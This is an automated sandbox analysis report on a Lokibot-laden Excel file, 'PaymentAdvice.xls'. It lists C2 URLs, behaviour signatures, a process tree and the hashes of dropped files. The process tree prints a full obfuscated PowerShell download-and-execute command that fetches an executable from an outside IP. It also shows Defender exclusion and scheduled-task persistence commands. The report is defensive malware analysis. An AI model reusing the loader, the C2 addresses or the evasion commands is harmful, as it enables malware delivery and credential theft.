Analysis

  • max time kernel
    130s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    18-11-2024 17:38

General

  • Target

    PaymentAdvice.xls

  • Size

    1.1MB

  • MD5

    038c9e2471b60b7ad1395c6fcbdb46de

  • SHA1

    4663cf7b0be0dc80f255d2e3fa210120910d8e1d

  • SHA256

    c1b87e35d9bcc37980e406e3c9aa910aed0dde54f90ffbd521291c80b230b3f3

  • SHA512

    7a6b8da94b152230b5c41bc90e2e7fd465ee4db61083e62b6e36f74a46197bd64117b3d5be3a6b6b433eee3b935c555bde4bdad9e3b177fc6f50b1a6c31d12e9

  • SSDEEP

    24576:guq9PLiijE2Z5Z2amsQnNF84LJQoh6sQ/E7DxA8r+W4:guEPLiij7Z5ZKsYFjLJQoh6X/EX+d

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.95/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PaymentAdvice.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1484
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2944
    • C:\Windows\SysWOW64\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE
      "C:\Windows\SysTEm32\wiNDOwSpoWERsHelL\v1.0\POwerSHELL.ExE" "PoWErShELl.EXe -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt ; iNvoke-eXPrEssion($(iNvoKe-ExprESsiOn('[syStEm.TExT.eNCOdING]'+[cHAR]58+[CHar]58+'Utf8.gEtsTrING([SySTeM.CoNVERt]'+[char]58+[Char]58+'fromBAse64StrIng('+[char]34+'JEtQeWw1UEl4REFxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlUmRlRklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVwR2NKekppUyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdtRWZCcVZKd2IsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT2hlbmlXY0dJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYWNLZGFobmZjYSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT1dTdUFVSGV4bSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkS1B5bDVQSXhEQXE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzM2L2Nhc3BvbC5leGUiLCIkZW5WOkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzdGFSVC1TbGVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHAr]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -noP -W 1 -c dEvicECREDenTIAlDePLOYMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2764
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dgmuiruf.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1744
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF548.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF547.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3068
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1960
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2344
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\bdWEysRwjYwmy.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1348
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bdWEysRwjYwmy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7C51.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1944
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1360

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

    Filesize

    717B

    MD5

    822467b728b7a66b081c91795373789a

    SHA1

    d8f2f02e1eef62485a9feffd59ce837511749865

    SHA256

    af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

    SHA512

    bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B083487247EB8FBD76503EF0DA269B6B

    Filesize

    345B

    MD5

    dfe9d40108cd6499968560d0319998c6

    SHA1

    6b79281f7efec1b9fb942e6e0cd3eb5e9f776e73

    SHA256

    1dc7e4150fff57a7423b4d0ebeb3a5f966593b4dad4b803840f6c4a2f814951e

    SHA512

    5d4d685a5f15372d4ae8fdc08ab92d2f2f173f586b58315d35a62318f71b9fce7f84b4501f50024e95225a53856ab8170bcf1adf8805eaddb392250082c9ff56

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

    Filesize

    192B

    MD5

    6c0d78bad0ad31a8cdc648bc3db326fc

    SHA1

    03d83efcbe4cdd21fe3448a8a446b360a6e2d498

    SHA256

    c31ca02b84bba23b19105cd86dbe8c082fa570169036349a43f32b981f16a122

    SHA512

    2a5ff5a52db7ae28b42e4951714554c413708930ce92b9ac573182bdc644be85a63f1470457f375e1f997d812c165c8a4adeecce8c2756933f7fe80c611d1398

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B083487247EB8FBD76503EF0DA269B6B

    Filesize

    544B

    MD5

    dddd2a95c291e7aa1a85553d44d7ec09

    SHA1

    2e84eb1cf96858ada422fc5ea52112ee278c32df

    SHA256

    5abebe2c9390de50275d12bd33eb9e93cfe65dac90c5585fa928832ca89fda82

    SHA512

    a1e42c0531c975506872ac45a0ff2ac7dc8e39459d358ea1f7771c7753b2ade384a1a1d66f26c93524432b6da9aaa03c85a5ee434685a952bb65a3c657a03926

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe[1].hta

    Filesize

    8KB

    MD5

    9427d6b1cf4e282f2140587823409691

    SHA1

    059037ad5c4c6054bdcd163cb1969a84cc1813e9

    SHA256

    a9cc9394d9450742c8f2b9b9c9ab7b94fda208cd6977458521554121a49f45d1

    SHA512

    a394958ceb3d1594328c1c7d091f295080b1fa93a787aec87456b1438559003e68e1c0e38eee6d5779a4227a0413393f90a587129d8c44d42467e0b3c2382ab2

  • C:\Users\Admin\AppData\Local\Temp\CabE7EF.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESF548.tmp

    Filesize

    1KB

    MD5

    e47593c08b1da91880d301b266e995e1

    SHA1

    dc83f06b278c4425e9fca927542a292123c60433

    SHA256

    be1f43bff13fe54dfebd7735de4142dd4876cd26ac2045d211bbd763b24c8089

    SHA512

    f62e9f99c1781cd7e0340e78ca068d3e0b0f61f6c3bcee8c7843cf6e042d4638f9d7a6e1f9e9133977f3be966537055b517de4b3e67d914ad80a9cabcd1baa27

  • C:\Users\Admin\AppData\Local\Temp\dgmuiruf.dll

    Filesize

    3KB

    MD5

    02556bd8159a9df25d46609f7d13a7f6

    SHA1

    3bc4db7d2ea82d478c8f0215016e736ae4a045c5

    SHA256

    3e8afbc7c6730817346b2da47504c1467362e3541c159d815e09fda7970708a5

    SHA512

    163eedc251e9f6f748bd0c6cb030a78bb5d117b7a3c3905480f087f68c1eec707c1bad4d0e4e9333b047d384f862c7b4685070c449c558863e646dfaed5443fc

  • C:\Users\Admin\AppData\Local\Temp\dgmuiruf.pdb

    Filesize

    7KB

    MD5

    f74e18a16cddbbcbf01e3b5158e3ea27

    SHA1

    b7c29197cfe9c4339c13c8ce3f41a64e1260a8ea

    SHA256

    2488ae920ecab97eaa9c15cb99c4e19a19374a16adfc5a0e8fbf91e44ba90dfa

    SHA512

    dd39c7f4c53cf834f5dacf2660f71fac5649b6135e0bb4d77ea7363b070556b22a407fe60ede434d91fd7d091333faa94a1f2fd35777fffd1fd21030a2b836b4

  • C:\Users\Admin\AppData\Local\Temp\tmp7C51.tmp

    Filesize

    1KB

    MD5

    1daa231e21fac534b5ca7ebcf1dd84eb

    SHA1

    4228414c36c49c9c15d823ac8ef842b02c61e619

    SHA256

    25250d0dcea1c7cf95a115d5f7dd1ffb23f5289be656f1e37f8f4a48bab4f93b

    SHA512

    80ae47221a8ff3d28d0ebd7229b5d11fff0d7c4ca23537d57d9b99c89235f8461f3bf9e720907efc5af629f002977dbe4f5bb53913a60b831f91691207cadc76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1163522206-1469769407-485553996-1000\0f5007522459c86e95ffcc62f32308f1_9d81b961-0275-4281-8321-63119951606b

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1163522206-1469769407-485553996-1000\0f5007522459c86e95ffcc62f32308f1_9d81b961-0275-4281-8321-63119951606b

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    5770fc06f566c7ae4bb95e32d5024368

    SHA1

    7ae8017d4d67c20c39f01ba1a4a68cb6e6bcdcdf

    SHA256

    bbe1e561719071b355021f3a7ebb1064c81e4abca3f4342425861cb21ed51867

    SHA512

    906d1375ef198faa831dadcaf9594f6943cae0fcf5d773b7970c2338eed6783bd62e968e346fe45da6225d70b4dc124c2186f4e7e75243da2192ad77c375bdd5

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    943c6b357ff29264c66f62e0fb322ad7

    SHA1

    3ea9a57a7fa7e3c2a7c9d695538b031b1f9fdbdc

    SHA256

    2c2a3044cb8c2b52d4aeed789db11b02884b0b65e6f3d1098ac71f7c521bfbfa

    SHA512

    b868ba0a6a493d5423e1dbb6e7836d577eaa5c763f92101bdf0d2587e4a353d8a5a669e1bbc50c10201d98d228ac3af0e917159c12fe1c8746b8530f53123835

  • C:\Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    497KB

    MD5

    8c34e99269d4121a0dfe4c3eaa9e269f

    SHA1

    5bbaa7dc726324e057eb4f78856c368488c4805a

    SHA256

    2899cb71414f7d46a6be0d40a5ba017d407a41f291154ea6a86f421754d11a76

    SHA512

    99f3cc287b9437ee888371fac3cf37d77d39c9468086feb0c80f4a0a4cc8a750c0b2798ec32a90aea3c88ed67c36005bcfd81d8e439edcdaca9e60caa1f3f277

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF547.tmp

    Filesize

    652B

    MD5

    d8876fa1bcf5b62a341c35e06229190e

    SHA1

    0a9c2a41b1d621b23e78f9579f42f6e47b4a2f82

    SHA256

    eef86f90d16fb86b86a96af7c61166167209611556614d419a7525583cd94508

    SHA512

    fd25b15d6bfbecbe4e3edb5921012cdb4cf6641228f96bd985df307339911a4b9294fdc08fa36e4db3934338469bbc5bbbcf9bb3b3ee2799d63ea5a28ae6bc06

  • \??\c:\Users\Admin\AppData\Local\Temp\dgmuiruf.0.cs

    Filesize

    487B

    MD5

    ee60617752b2061187e3773f962ff810

    SHA1

    5d3dc400820671b51499e9003fcbd7794d07e315

    SHA256

    69736289404f9f61bb67a99a24945aaa347591458b09f4dd686bbc58d8b25ce9

    SHA512

    5bf701c77b31bcf3421fa2cc4649127b54656175bdfb238ddca8606063ceec69fd76d2f611b5f55f246a3003d3fd76b1b318fa0fc4cb1b10d9b8b04e153bf231

  • \??\c:\Users\Admin\AppData\Local\Temp\dgmuiruf.cmdline

    Filesize

    309B

    MD5

    17cbdbcdc8ef7275d92aac76d91ad187

    SHA1

    e965d046d7ff8d9671e866b8d353ac03e445a2d9

    SHA256

    80b7c6626d710a5d560d1b1a68bfdb8a8c7fa92a581a650452bd7ddb780a42fe

    SHA512

    b16c9dc3542ccb8cd2e07f106dde9721d56f080e120c1a6b1e60c069ff5934dd05364eb8291315bca3cf2833c30be8dceefa9e5d4665c0d466d72e4abac57b68

  • memory/1360-94-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1360-96-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1360-98-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/1360-101-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1360-99-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1360-92-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1360-88-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1360-90-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/1484-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1484-56-0x000000007295D000-0x0000000072968000-memory.dmp

    Filesize

    44KB

  • memory/1484-1-0x000000007295D000-0x0000000072968000-memory.dmp

    Filesize

    44KB

  • memory/1484-17-0x0000000002400000-0x0000000002402000-memory.dmp

    Filesize

    8KB

  • memory/1960-72-0x0000000000D70000-0x0000000000DD4000-memory.dmp

    Filesize

    400KB

  • memory/1960-71-0x0000000000310000-0x0000000000322000-memory.dmp

    Filesize

    72KB

  • memory/1960-70-0x0000000000DD0000-0x0000000000E52000-memory.dmp

    Filesize

    520KB

  • memory/2944-16-0x00000000025E0000-0x00000000025E2000-memory.dmp

    Filesize

    8KB